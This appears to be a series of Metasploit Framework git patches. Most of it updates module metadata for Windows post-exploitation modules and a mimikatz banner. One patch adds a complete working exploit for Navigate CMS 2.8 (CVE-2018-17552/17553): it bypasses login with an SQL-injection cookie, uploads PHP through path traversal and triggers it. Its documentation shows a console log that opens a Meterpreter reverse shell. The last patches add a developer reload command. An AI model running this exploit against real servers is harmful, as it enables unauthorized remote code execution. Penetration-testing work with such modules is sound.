"2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_snmp.rb", @@ -120829,6 +150220,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_termserv.rb", @@ -120858,6 +150251,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_tokens.rb", @@ -120887,6 +150282,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_tomcat.rb", @@ -120916,6 +150313,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_trusted_locations.rb", @@ -120949,6 +150348,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_unattend.rb", @@ -120978,6 +150379,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/file_from_raw_ntfs.rb", @@ -121007,6 +150410,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/forensics/browser_history.rb", @@ -121037,6 +150442,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/forensics/duqu_check.rb", @@ -121066,6 +150473,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/forensics/enum_drives.rb", @@ -121095,6 +150504,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/forensics/imager.rb", @@ -121124,6 +150535,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/forensics/nbd_server.rb", @@ -121153,6 +150566,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/forensics/recovery_files.rb", @@ -121182,6 +150597,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/hashdump.rb", @@ -121213,6 +150630,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/local_admin_search_enum.rb", @@ -121242,6 +150661,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/lsa_secrets.rb", @@ -121271,6 +150692,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/make_csv_orgchart.rb", @@ -121300,6 +150723,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/windows/gather/memory_grep.rb", @@ -121330,6 +150755,8 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/netlm_downgrade.rb", @@ -121359,6 +150786,8 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-06-26 08:22:11 +0000", "path": "/modules/post/windows/gather/ntds_grabber.rb", @@ -121388,6 +150817,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/ntds_location.rb", @@ -121417,6 +150848,8 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/outlook.rb", @@ -121447,6 +150880,8 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/phish_windows_credentials.rb", @@ -121476,6 +150911,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/resolve_sid.rb", @@ -121505,6 +150942,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/reverse_lookup.rb", @@ -121537,6 +150976,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-06-12 17:11:29 +0000", "path": "/modules/post/windows/gather/screen_spy.rb", @@ -121566,6 +151007,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/smart_hashdump.rb", @@ -121595,6 +151038,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/tcpnetstat.rb", @@ -121624,6 +151069,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/usb_history.rb", @@ -121653,6 +151100,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-19 01:35:19 +0000", "path": "/modules/post/windows/gather/win_privs.rb", @@ -121682,6 +151131,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/wmic_command.rb", @@ -121711,6 +151162,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/word_unc_injector.rb", @@ -121740,6 +151193,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/windows/manage/add_user_domain.rb", @@ -121769,6 +151224,8 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/archmigrate.rb", @@ -121798,6 +151255,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/change_password.rb", @@ -121827,6 +151286,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/clone_proxy_settings.rb", @@ -121856,6 +151317,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/delete_user.rb", @@ -121885,6 +151348,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/download_exec.rb", @@ -121914,6 +151379,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/driver_loader.rb", @@ -121943,6 +151410,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-21 22:46:30 +0000", "path": "/modules/post/windows/manage/enable_rdp.rb", @@ -121972,6 +151441,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/enable_support_account.rb", @@ -122002,6 +151473,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/exec_powershell.rb", @@ -122032,6 +151505,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/windows/manage/forward_pageant.rb", @@ -122061,6 +151536,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/hashcarve.rb", @@ -122091,6 +151568,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/ie_proxypac.rb", @@ -122120,6 +151599,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/inject_ca.rb", @@ -122149,6 +151630,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-06-12 17:11:29 +0000", "path": "/modules/post/windows/manage/inject_host.rb", @@ -122181,6 +151664,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/killav.rb", @@ -122210,6 +151695,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/migrate.rb", @@ -122239,6 +151726,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/mssql_local_auth_bypass.rb", @@ -122269,6 +151758,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/multi_meterpreter_inject.rb", @@ -122298,6 +151789,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/nbd_server.rb", @@ -122328,6 +151821,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/payload_inject.rb", @@ -122357,6 +151852,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-08-28 11:33:17 +0000", "path": "/modules/post/windows/manage/peinjector.rb", @@ -122386,6 +151883,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-26 17:46:18 +0000", "path": "/modules/post/windows/manage/persistence_exe.rb", @@ -122415,6 +151914,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/portproxy.rb", @@ -122444,6 +151945,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-27 07:41:06 +0000", "path": "/modules/post/windows/manage/powershell/build_net_code.rb", @@ -122474,6 +151977,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/powershell/exec_powershell.rb", @@ -122504,6 +152009,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/powershell/load_script.rb", @@ -122533,6 +152040,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/pptp_tunnel.rb", @@ -122563,6 +152072,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/windows/manage/priv_migrate.rb", @@ -122592,6 +152103,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/pxeexploit.rb", @@ -122621,6 +152134,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/reflective_dll_inject.rb", @@ -122650,6 +152165,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/remove_ca.rb", @@ -122679,6 +152196,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/remove_host.rb", @@ -122708,6 +152227,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-04-03 04:57:41 +0000", "path": "/modules/post/windows/manage/rid_hijack.rb", @@ -122737,6 +152258,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/rpcapd_start.rb", @@ -122766,6 +152289,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-04-09 15:27:50 +0000", "path": "/modules/post/windows/manage/run_as.rb", @@ -122795,6 +152320,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/run_as_psh.rb", @@ -122824,6 +152351,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/sdel.rb", @@ -122854,6 +152383,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/sticky_keys.rb", @@ -122883,6 +152414,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/vmdk_mount.rb", @@ -122912,6 +152445,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/vss_create.rb", @@ -122941,6 +152476,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/vss_list.rb", @@ -122970,6 +152507,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/vss_mount.rb", @@ -122999,6 +152538,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/windows/manage/vss_set_storage.rb", @@ -123028,6 +152569,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/vss_storage.rb", @@ -123057,6 +152600,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/windows/manage/wdigest_caching.rb", @@ -123086,6 +152631,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/webcam.rb", @@ -123115,6 +152662,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/windows/recon/computer_browser_discovery.rb", @@ -123144,6 +152693,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/recon/outbound_ports.rb", @@ -123173,6 +152724,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/recon/resolve_ip.rb", @@ -123202,6 +152755,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/wlan/wlan_bss_list.rb", @@ -123231,6 +152786,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/wlan/wlan_current_connection.rb", @@ -123260,6 +152817,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/wlan/wlan_disconnect.rb", @@ -123289,6 +152848,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-03 11:41:09 +0000", "path": "/modules/post/windows/wlan/wlan_probe_request.rb", @@ -123318,6 +152879,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/windows/wlan/wlan_profile.rb", From 736b60f63c205a46ffa3398333415515ed9b9025 Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 26 Sep 2018 14:17:59 +1000 Subject: [PATCH 058/192] Update payloads to include the new Kiwi release --- .../meterpreter/ui/console/command_dispatcher/kiwi.rb | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index ecc56039b2..f5a0c9957d 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -37,13 +37,12 @@ class Console::CommandDispatcher::Kiwi def initialize(shell) super print_line - print_line - print_line(" .#####. mimikatz 2.1.1 20180820 (#{client.session_type})") + print_line(" .#####. mimikatz 2.1.1 20180925 (#{client.session_type})") print_line(" .## ^ ##. \"A La Vie, A L'Amour\"") - print_line(" ## / \\ ## /* * *") - print_line(" ## \\ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )") - print_line(" '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)") - print_line(" '#####' Ported to Metasploit by OJ Reeves `TheColonial` * * */") + print_line(" ## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )") + print_line(" ## \\ / ## > http://blog.gentilkiwi.com/mimikatz") + print_line(" '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )") + print_line(" '#####' > http://pingcastle.com / http://mysmartlogon.com ***/") print_line si = client.sys.config.sysinfo From f882c3aec2bbd15e7952dd7b133bcef947c46dd5 Mon Sep 17 00:00:00 2001 From: Pyriphlegethon Date: Wed, 26 Sep 2018 21:39:15 +0200 Subject: [PATCH 059/192] Add Navigate CMS Unauthenticated Remote Code Execution --- .../exploits/multi/http/navigate_cms_rce.rb | 116 ++++++++++++++++++ 1 file changed, 116 insertions(+) create mode 100644 modules/exploits/multi/http/navigate_cms_rce.rb diff --git a/modules/exploits/multi/http/navigate_cms_rce.rb b/modules/exploits/multi/http/navigate_cms_rce.rb new file mode 100644 index 0000000000..952a3faff7 --- /dev/null +++ b/modules/exploits/multi/http/navigate_cms_rce.rb @@ -0,0 +1,116 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Navigate CMS Unauthenticated Remote Code Execution', + 'Description' => %q( + This module exploits insufficient sanitization in the database::protect + method to bypass authentication. + It then uses a path traversal vulnerability in navigate_upload.php that + allows authenticated users to upload PHP files to arbitrary locations. + Together these vulnerabilities allow an unauthenticated attacker to + execute arbitrary PHP code remotely. + + This module was tested against Navigate CMS 2.8. + ), + 'Author' => + [ + 'Pyriphlegethon' # Discovery / msf module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2018-17552'], # Authentication bypass + ['CVE', '2018-17553'] # File upload + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Payload' => {}, + 'Targets' => + [ + ['Automatic', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Sep 26 2018')) + + register_options( + [ + OptString.new('TARGETURI', [true, 'Base Navigate CMS directory path', '/navigate/']) + ] + ) + end + + def check + check_resp = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, '/login.php') + ) + + if check_resp && check_resp.body.include?('Navigate CMS v2.8') + return CheckCode::Appears + end + + return CheckCode::Safe + end + + def exploit + init = send_request_cgi( + 'method' => 'POST', + 'cookie' => 'navigate-user=\" OR TRUE--%20', + 'uri' => normalize_uri(target_uri.path, '/login.php') + ) + + fail_with(Failure::Unreachable, 'Unable to reach target') unless init + + session_id = init.get_cookies_parsed + .values.select { |v| v.to_s =~ /NVSID_/ }.first + + if init.code == 302 && session_id + print_good('Login bypass successful') + else + fail_with(Failure::NoAccess, 'Login bypass failed') + end + + php = %() + data = Rex::MIME::Message.new + data.add_part(php, 'image/jpeg', nil, + 'form-data; name="file"; filename="test.jpg"') + data_post = data.to_s + + upload = send_request_cgi( + 'method' => 'POST', + 'cookie' => init.get_cookies, + 'vars_get' => Hash[{ + 'session_id' => session_id, + 'engine' => 'picnik', + 'id' => '../../../navigate_info.php' + }.to_a.shuffle], + 'uri' => normalize_uri(target_uri.path, '/navigate_upload.php'), + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => data_post + ) + + fail_with(Failure::Unreachable, 'Unable to reach target') unless upload + + if upload.code == 200 + print_good('Upload successful') + else + fail_with(Failure::Unknown, 'Upload unsuccessful') + end + + print_status('Triggering payload...') + send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, '/navigate_info.php') + ) + end +end From 2d568f884e8be32e1c9cd204d78508e77786e492 Mon Sep 17 00:00:00 2001 From: Pyriphlegethon Date: Wed, 26 Sep 2018 22:37:16 +0200 Subject: [PATCH 060/192] Add documentation for Navigate CMS Unauthenticated Remote Code Execution --- .../exploit/multi/http/navigate_cms_rce.md | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 documentation/modules/exploit/multi/http/navigate_cms_rce.md diff --git a/documentation/modules/exploit/multi/http/navigate_cms_rce.md b/documentation/modules/exploit/multi/http/navigate_cms_rce.md new file mode 100644 index 0000000000..abd42cfcee --- /dev/null +++ b/documentation/modules/exploit/multi/http/navigate_cms_rce.md @@ -0,0 +1,40 @@ +## Description + +This module exploits insufficient sanitization in the database::protect method to bypass authentication. It then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations. Together these vulnerabilities allow an unauthenticated attacker to execute arbitrary PHP code remotely. This module was tested against Navigate CMS 2.8. + +## Vulnerable Application + +[Navigate CMS 2.8](https://master.dl.sourceforge.net/project/navigatecms/releases/navigate-2.8r1302.zip) + +## Verification Steps + +1. Install Navigate CMS +2. Start `msfconsole` +3. `use exploit/multi/http/navigate_cms_rce` +4. `set RHOST ` +5. `check` +6. You should see `The target appears to be vulnerable.` +7. `exploit` +8. You should get a meterpreter session + +## Scenarios + +### Navigate CMS on Ubuntu 18.04 + +``` +msf5 > use exploit/multi/http/navigate_cms_rce +msf5 exploit(multi/http/navigate_cms_rce) > set RHOST 192.168.178.45 +RHOST => 192.168.178.45 +msf5 exploit(multi/http/navigate_cms_rce) > check +[*] 192.168.178.45:80 The target appears to be vulnerable. +msf5 exploit(multi/http/navigate_cms_rce) > exploit + +[*] Started reverse TCP handler on 192.168.178.35:4444 +[+] Login bypass successful +[+] Upload successful +[*] Triggering payload... +[*] Sending stage (37775 bytes) to 192.168.178.45 +[*] Meterpreter session 1 opened (192.168.178.35:4444 -> 192.168.178.45:52720) at 2018-09-26 22:24:59 +0200 + +meterpreter > +``` From eeee289e2f3b4e2fc626141903f4c3915f943c35 Mon Sep 17 00:00:00 2001 From: Erin Bleiweiss Date: Wed, 26 Sep 2018 17:16:46 -0500 Subject: [PATCH 061/192] Add command to reload all files changed as per git diff --- lib/msf/ui/console/command_dispatcher/developer.rb | 13 ++++++++++++- 1 file changed, 12 insertions(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/developer.rb b/lib/msf/ui/console/command_dispatcher/developer.rb index c18505e42f..c17d1a68b2 100644 --- a/lib/msf/ui/console/command_dispatcher/developer.rb +++ b/lib/msf/ui/console/command_dispatcher/developer.rb @@ -193,9 +193,10 @@ class Msf::Ui::Console::CommandDispatcher::Developer def cmd_reload_lib_help print_line 'Usage: reload_lib lib/to/reload.rb [...]' + print_line ' reload_lib diff' print_line print_line 'Reload one or more library files from specified paths.' - print_line + print_line 'Use \'diff\' to reload all changed files in your current git working tree.' end # @@ -205,6 +206,9 @@ class Msf::Ui::Console::CommandDispatcher::Developer if args.empty? || args.include?('-h') || args.include?('--help') cmd_reload_lib_help return + elsif args.include?('diff') + cmd_reload_diff_files + return end args.each { |path| reload_file(path) } @@ -217,6 +221,13 @@ class Msf::Ui::Console::CommandDispatcher::Developer tab_complete_filenames(str, words) end + def cmd_reload_diff_files + files = %x(git diff --name-only).split + files.each do | file | + reload_file(file) + end + end + def cmd_log_help print_line 'Usage: log' print_line From b3053020d107da2f7534ee3ba7f4731e2e84834c Mon Sep 17 00:00:00 2001 From: Erin Bleiweiss Date: Wed, 26 Sep 2018 17:23:46 -0500 Subject: [PATCH 062/192] Update help docs --- lib/msf/ui/console/command_dispatcher/developer.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/developer.rb b/lib/msf/ui/console/command_dispatcher/developer.rb index c17d1a68b2..3762949a5b 100644 --- a/lib/msf/ui/console/command_dispatcher/developer.rb +++ b/lib/msf/ui/console/command_dispatcher/developer.rb @@ -192,11 +192,10 @@ class Msf::Ui::Console::CommandDispatcher::Developer end def cmd_reload_lib_help - print_line 'Usage: reload_lib lib/to/reload.rb [...]' - print_line ' reload_lib diff' + print_line 'Usage: reload_lib lib/to/reload.rb [...] [diff]' print_line print_line 'Reload one or more library files from specified paths.' - print_line 'Use \'diff\' to reload all changed files in your current git working tree.' + print_line 'Use the argument \'diff\' to reload all changed files in your current git working tree.' end # From 